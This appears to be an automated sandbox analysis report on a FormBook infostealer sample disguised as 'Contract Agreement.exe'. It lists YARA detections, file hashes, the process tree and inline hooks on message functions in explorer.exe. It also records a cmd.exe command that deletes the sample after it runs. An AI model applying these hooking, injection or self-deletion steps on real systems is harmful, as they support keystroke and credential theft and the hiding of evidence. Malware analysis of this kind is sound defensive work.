Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0

Statistics

Behavior


System Behavior

General

Start time: 13:50:58
Start date: 12/04/2021
Path: C:\Users\user\Desktop\Contract Agreement.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Contract Agreement.exe'
Imagebase: 0x400000
File size: 228086 bytes
MD5 hash: 75612F2E3922D80AFE14068C3A510C99
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 13:50:59
Start date: 12/04/2021
Path: C:\Users\user\Desktop\Contract Agreement.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Contract Agreement.exe'
Imagebase: 0x400000
File size: 228086 bytes
MD5 hash: 75612F2E3922D80AFE14068C3A510C99
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 13:51:04
Start date: 12/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:51:17
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cmstp.exe
Imagebase: 0x310000
File size: 82944 bytes
MD5 hash: 4833E65ED211C7F118D4A11E6FB58A09
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 13:51:21
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\Contract Agreement.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:51:21
Start date: 12/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
